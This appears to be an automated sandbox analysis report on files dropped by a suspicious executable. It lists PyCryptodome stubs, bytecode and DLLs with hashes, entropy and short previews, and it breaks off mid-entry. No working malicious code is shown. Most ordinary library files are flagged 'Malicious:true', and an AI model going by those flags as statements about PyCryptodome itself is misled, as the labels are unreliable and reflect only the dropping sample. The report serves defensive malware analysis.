                                                                                                                                            SHA-512:C15166072649BFE7208434528CD62AF1453CE2BE790269D35C759A06C56B16197152E0A15A88BF564F90E9789F8325D219FDC6FA95DBF724DCBC7A79F2B1E0F2
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Tuple, Optional, overload, Literal....from Cryptodome.Math.Numbers import Integer..from Cryptodome.IO._PBES import ProtParams....__all__ = ['generate', 'construct', 'import_key',.. 'RsaKey', 'oid']....RNG = Callable[[int], bytes]....class RsaKey(object):.. def __init__(self, **kwargs: int) -> None: ....... @property.. def n(self) -> int: ..... @property.. def e(self) -> int: ..... @property.. def d(self) -> int: ..... @property.. def p(self) -> int: ..... @property.. def q(self) -> int: ..... @property.. def u(self) -> int: ..... @property.. def invp(self) -> int: ..... @property.. def invq(self) -> int: ....... def size_in_bits(self) -> int: ..... def size_in_bytes(self) -> int: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool:... # legacy.. def public_key(self) -> RsaKey: ..... def __eq__(self, ot

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ec_ws.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):754688
                                                                                                                                            Entropy (8bit):7.6249603206444005
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:l1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6hM:XYmzHoxJFf1p34hcrn5Go9yQO6q
                                                                                                                                            MD5:102898D47B45548E7F7E5ECC1D2D1FAA
                                                                                                                                            SHA1:DDAE3A3BDD8B83AF42126245F6CB24DC2202BC04
                                                                                                                                            SHA-256:C9BF3CF5707793C6026BFF68F2681FAAD29E953ED891156163CD0B44A3628A92
                                                                                                                                            SHA-512:85A42FC08C91AFF50A9FF196D6FE8ABD99124557341B9809B62A639957B166C2A7EFEA0A042BE2D753464DF5908DF4F5FE01A91C239B744CD44A70B79EF81048
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d...R..e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed25519.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27648
                                                                                                                                            Entropy (8bit):5.792776923715812
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:mBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsla15gkbQ0e1:cL/g28Ufsxg9GmvPauYLxtX1D8kf
                                                                                                                                            MD5:717DA232A3A9F0B94AF936B30B59D739
                                                                                                                                            SHA1:F1B3676E708696585FBCB742B863C5BB913D923F
                                                                                                                                            SHA-256:B3FD73D54079903C0BE39BA605ED9BB58ECD1D683CCB8821D0C0CC795165B0C6
                                                                                                                                            SHA-512:7AF46035F9D4A5786ED3CE9F97AC33637C3428EF7183DED2AFD380265FAE6969BB057E3B5D57C990DD083A9DB2A67BEA668D4215E78244D83D7EE7E0A7B40143
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d...R..e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed448.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67072
                                                                                                                                            Entropy (8bit):6.060435635420756
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:YqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxROpq:YqctkGACFI5t35q2JbgrwwOoqLTM9rMq
                                                                                                                                            MD5:ADF96805C070920EA90D9AB4D1E35807
                                                                                                                                            SHA1:D8FA8E29D9CDCD678DC03DA527EAF2F0C3BEF21A
                                                                                                                                            SHA-256:A36B1EDC104136E12EB6F28BD9366D30FFCEC0434684DC139314723E9C549FB7
                                                                                                                                            SHA-512:FB67C1F86CF46A63DF210061D16418589CD0341A6AA75AB49F24F99AD3CFF874BB02664706B9E2C81B7EF7300AF5BB806C412B4F069D22B72F7D9EBFFF66FE61
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d...S..e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_openssh.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):331
                                                                                                                                            Entropy (8bit):4.758113161274864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB6RNx6FJdRloxdRX8jL8SdyAEBfFpU80/p9YKXrH0L8Sy:1REYB6RT61Rlo3RX8jLVMBM80/p+MrUe
                                                                                                                                            MD5:8BEBFA73A502269CB8A0C4CE6C714C5A
                                                                                                                                            SHA1:176037806AA4E83D03FEDCC40CBACF9D1D5F675A
                                                                                                                                            SHA-256:564C2B01DC5D096BF508761DB881E201172E2D60E939BA2F78E20BE46A74DDA0
                                                                                                                                            SHA-512:50C4AE1F408F98EA4650966444F3E552559A3D92ED79EC66E0C3424A6EBAA11AD577F47853C91BCDC1B5910C2A2815D55CCEFD23D5C1E0BD4F02136CCB3D8884
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple....def read_int4(data: bytes) -> Tuple[int, bytes]: .....def read_bytes(data: bytes) -> Tuple[bytes, bytes]: .....def read_string(data: bytes) -> Tuple[str, bytes]: .....def check_padding(pad: bytes) -> None: .....def import_openssh_private_generic(data: bytes, password: bytes) -> Tuple[str, bytes]: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_x25519.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10752
                                                                                                                                            Entropy (8bit):4.488514144301916
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:IpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADBhDTAbcX6gn/7EC:uVddiT7pgTctdErDDDTicqgn/7
                                                                                                                                            MD5:148E1600E9CBAF6702D62D023CAC60BC
                                                                                                                                            SHA1:4CDD8445408C4165B6E029B9966C71BC45E634A2
                                                                                                                                            SHA-256:1461AAFD4B9DC270128C89C3EB5358794C77693BB943DC7FC42AA3BB0FC52B16
                                                                                                                                            SHA-512:53155DA3FD754AF0BC30E2A51F0B579B8A83A772025CE0B4AFD01A31B8A40F46533FDA9CC3D0D32E9480DBBD7DD4A28F9DAAC11A370B0435E5E74666ACF9181C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d...R..e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Random\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1567
                                                                                                                                            Entropy (8bit):4.908726964484845
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:6yhnoj2WT/YJhsq9rYPvfqCrJ4eBPFuGBvEeEWV:9Y2WT6smkPvCGuG5Ey
                                                                                                                                            MD5:FA2B83BC2B5B981E3051C940F1567BC4
                                                                                                                                            SHA1:0F198BB2C8197665CB054C7340E04D3472A8CE80
                                                                                                                                            SHA-256:426D8C06A460D840CBBD5750E89B5207A4E8BE03BED56F0FC5CF9B9475D1AC25
                                                                                                                                            SHA-512:3C4241F8A197AA25DD90155D40E349707F020BC4E215A85FA17909202D7DB40601196EE07488759CEF93A8448E378DCB21CB2738CEE736F0AD0D887891DA5332
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eN.........................F.....d.d.g.Z.d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d...Z.e.Z.d.S.)...new..get_random_bytes.........urandomc.....................&.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.S.)..._UrandomRNGc..................... .....t...........|...............S.).z0Return a random byte string of the desired size.r....)...self..ns.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Random\__init__.py..readz._UrandomRNG.read....s..........q.z.z........c...........................d.S...z0Method provided for backward compatibility only.N....r....s.... r......flushz._UrandomRNG.flush!...............r....c...........................d.S.r....r....r....s.... r......reinitz._UrandomRNG.reinit%...r....r....c...........................d.S.r....r....r....s.... r......closez._UrandomRNG.close)...r....r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........sP...............................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Random\__init__.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):386
                                                                                                                                            Entropy (8bit):4.828244249619416
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBFovLD2dC1ZSM+mHv0tAE7Ky3L5RSMtAMjMEFy7yA4TSJDZj5:1REYB8D2ACM+meh7KyVVpJy7yAGkDR5
                                                                                                                                            MD5:A4CDA07BACD9EDBD7C0243B029D79400
                                                                                                                                            SHA1:B068F43B0EAE31972C2B6C6335BBCA2497B948FB
                                                                                                                                            SHA-256:3A9548EF07A83C2F2BF7DB05EDB776BD788B9D9C112EA8155333242839CC27D7
                                                                                                                                            SHA-512:A1412BAF95D6910D821B927BE91CFD740F2DD8A98E259950E5FF06409CEC8E01EB6B06AC1747A8FF06098849142EBF2754AEED361FFCD37954FFFC13BCE1D3C0
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(*args: Any, **kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Random\random.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):854
                                                                                                                                            Entropy (8bit):4.891350639959851
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REqJBQCf+sAJOIE5P0fid1o4zOZKXiojo/f:lQW+sd5CidO4ifao/f
                                                                                                                                            MD5:0B01F3499238530A9A99E48F305DB9AC
                                                                                                                                            SHA1:7AE9ADEAF96CF6B47C721A124AA568AB1A0B605C
                                                                                                                                            SHA-256:043AEDA2F263A42A0086FCBB0CA801FF1D9BF396FFCC966452FF25DD5030A013
                                                                                                                                            SHA-512:4CDCFA0E53EBE9F65207817A79419F6C60E6F0BB51EF4ECDB89736244058A690410F767EC8AAAC2C2B10BDB38361E0F60FCD3DF3580639935A423A0E6E068517
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Tuple, Union, Sequence, Any, Optional, TypeVar....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....T = TypeVar('T')....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence[T]) -> T: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Signature\DSS.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1129
                                                                                                                                            Entropy (8bit):4.991889645425908
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2C19gfi1z4NoQoAUx9Bw+LtvUO38AdILhG8A+N8APto5BfTE5PadOI:hyIicJoNRL9UfEIL/LWStrYdB
                                                                                                                                            MD5:D32A77F482DFEEFBCB62F924C4AB0E9B
                                                                                                                                            SHA1:275B76AFBE63A3413985B5472A69D50BF3E62D67
                                                                                                                                            SHA-256:C3EB4F62111C8C8A72FA79FFADC95468DBAAD42FCDAEE982F056D40A9AD3D499
                                                                                                                                            SHA-512:EE4E44C38C1E4943AC480B131686746ECC4D9475E913E5228C85B5C4A25C91127D87AE79C5CE4302E2DD43DCE74D4E759BC10B02EBE75609E26D3F82FFB07254
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional, Callable..from typing_extensions import Protocol....from Cryptodome.PublicKey.DSA import DsaKey..from Cryptodome.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......__all__ = ['new']....class DssSigScheme:.. def __init__(self, key: Union[DsaKey, EccKey], encoding: str, order: int) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .......class DeterministicDsaSigScheme(DssSigScheme):.. def __init__(self, key, encoding, order, private_key) -> None: .......class FipsDsaSigScheme(DssSigScheme):.. def __init__(self, key: DsaKey, encoding: str, order: int, randfunc: Callable) -> None: .......class FipsEcDsaSigScheme(DssSigScheme):.. def __init__(self, key: EccKey, encoding: str, order: int, randfunc: Callable) -> None: .......def new(key: Union[DsaKey, EccKey], mode: str, encoding: Optional[s

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Signature\PKCS1_PSS.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):899
                                                                                                                                            Entropy (8bit):5.021132080157918
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2C19jsY4Nf3fkKov27aBAOzev9Bw+LtZ3XEDf:Jyw3xf1ov2GovRLP3s
                                                                                                                                            MD5:043DCA61A172F98BB1E08257D09AC5BB
                                                                                                                                            SHA1:2EB8A180B62CBC43D8FCBF113D42F94FAF144E97
                                                                                                                                            SHA-256:3618D4E6762716A5EF09643D71106C232CCDE052F393BD46DCB3BC02EED50A4A
                                                                                                                                            SHA-512:31858A227C48053B1D7DF7FCF3BB2D91EF2C53EAFE16B04868C1E98615073C4FAC790F75148172A2445829613CBF1C8460F803F5A856D36FB9D79FA591674C8C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Signature\PKCS1_v1_5.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):471
                                                                                                                                            Entropy (8bit):4.916512539941739
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBkRE1BvxpkUgBx1z4L556W3x1AggPIbY9Bw5ZwWOLtw3A0PIbR3:1REFC19js1z4NNrAPAbY9Bw+Ltw3XAbV
                                                                                                                                            MD5:AFABDFC98F306D74E3D881319EB7DFB7
                                                                                                                                            SHA1:C9A8D72A935239A699194FF5E9AEAF66D3765CC6
                                                                                                                                            SHA-256:8A76E96EB20B5F500DB3F4366BDADA47A2598CDBF9A617FCD589EBD6A6563B67
                                                                                                                                            SHA-512:8F71524D0A9FB3972DF8DB41511BB340DC8706B877FA9A83D0C3D7E5AA4F14B5FD6F6A0E2A3E065CA2E1B8129F2AD149724DD255FFA786862E38A30E7409E64C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Signature\eddsa.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):751
                                                                                                                                            Entropy (8bit):4.99017908117981
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBlRE1BvxSk+w1z4L556trLuh72tR5A8TTo448/u4Jw1AL1A19YRG98mfvIqN:1REOC1+i1z4Nfh7IGhI+1mAl9ZfjufQl
                                                                                                                                            MD5:8A6895C524FEB5BFBF7CD6E37FD1CA27
                                                                                                                                            SHA1:F2A2C9BAC7056DE4E4D16A476558F342D01976FC
                                                                                                                                            SHA-256:6D25F1D512E42B6E7329C8B26AE11DAA330E0F12D5E79B5206634FFE609F8F9D
                                                                                                                                            SHA-512:9EAA65783BE892DF192AC754EC859B707D2532EDB14B765AD383B7D4D51B3FB517CCB47431251252BC5D65115AEDA8CB133D85A28C4836AE3A5428EA3F572D53
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Cryptodome.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Signature\pkcs1_15.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):585
                                                                                                                                            Entropy (8bit):5.066781948828717
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBkRE1BvxpkUgBx1z4L556W3x1AggPIbY9Bw5ZwWOLRwlbQgA85A3A0PIbR3:1REFC19js1z4NNrAPAbY9Bw+LRwlbDjP
                                                                                                                                            MD5:4856A933E18E17840CF5E5B55B01E173
                                                                                                                                            SHA1:3AB1F55A4DB2E806110C2270FF6B2E63B0D40DE1
                                                                                                                                            SHA-256:D9DF93028C824C4D4D171611B6EC4D2FE4600F352DC10292D4EEAA60E0A9B7EB
                                                                                                                                            SHA-512:33CA4BD39B3A88675CAA5C797A5B39C72BEDC95849BE6FE0E34F26E7BE6F993C3384F2B931FC4D68971BAA4DCA4EC657967F2083A6BA726F90C903BC92B6D608
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Signature\pss.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1075
                                                                                                                                            Entropy (8bit):5.102280133535786
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2C19jsY4Nf3fkKov27aBAOzev9Bw+LAu8Bo633XfD7:Jyw3xf1ov2GovRLAVnPf
                                                                                                                                            MD5:F3210D715A547B91AA2A961E52ACB647
                                                                                                                                            SHA1:F982A54C3EFBF8CC8036CB1204F4702078014678
                                                                                                                                            SHA-256:1B98011074B37E537E2A2B1D90D1BC4003E18DB7F7B4EEB8816F2690491A912B
                                                                                                                                            SHA-512:27CEDE0706A645DFFA48AEB611291494D5ACBA805D740387FF295187E1CA74EDEBB8662C815A415799DB7BC34C566E5C0E3BF6DD9E7D7F7FB45FC85386198419
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKe

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\Counter.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2343
                                                                                                                                            Entropy (8bit):5.282791721396154
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:7Fsj8MtyHquSS9zvu8DjtRfadZ2W8R708:ZsYMQ1SsDxxRfad/mn
                                                                                                                                            MD5:769D28293D0D745CEA2F198DF2FC60AF
                                                                                                                                            SHA1:965594B15AEF0842A439DE79FE4D6AAE4B16C668
                                                                                                                                            SHA-256:CA99B74AA2F3CA0E4E08F9B23B0E284FF3A2113393B590231C2E128CC88FB8B3
                                                                                                                                            SHA-512:3DBF6C5604A9E44EAD7C6CD12CB228D8A2BF1799DD9531EABADEB11909310882942FE9BD7DA5CEB8B905A8CD84F92702F7E7D15E05DFF725DDAAFD383BEBC068
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d...Z.d.S.)...........Fc..........................|.d.z...d.k.....r.t...........d.................|.....................................}.|.|.k.....r.t...........d.|.|.f.z...................|.d.z...|.|.|.|.d...S.).a....Create a stateful counter block function suitable for CTR encryption modes... Each call to the function returns the next counter block.. Each counter block is made up by three parts:.. +------+--------------+-------+. |prefix| counter value|postfix|. +------+--------------+-------+.. The counter value is incremented by 1 at each call... Args:. nbits (integer):. Length of the desired counter value, in bits. It must be a multiple of 8.. prefix (byte string):. The constant prefix of the counter block. By default, no prefix is. used.. suffix (byte string):. The constant postfix of the counter block. By default, no suffix is. used.. initial_value (integer

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\Counter.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):295
                                                                                                                                            Entropy (8bit):4.705947008789207
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
                                                                                                                                            MD5:48844D3840F12D7CC253481AEB936730
                                                                                                                                            SHA1:2329321B884361FF52CD1E79D4ECD3ABD2C08309
                                                                                                                                            SHA-256:7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
                                                                                                                                            SHA-512:06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Util\Padding.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):243
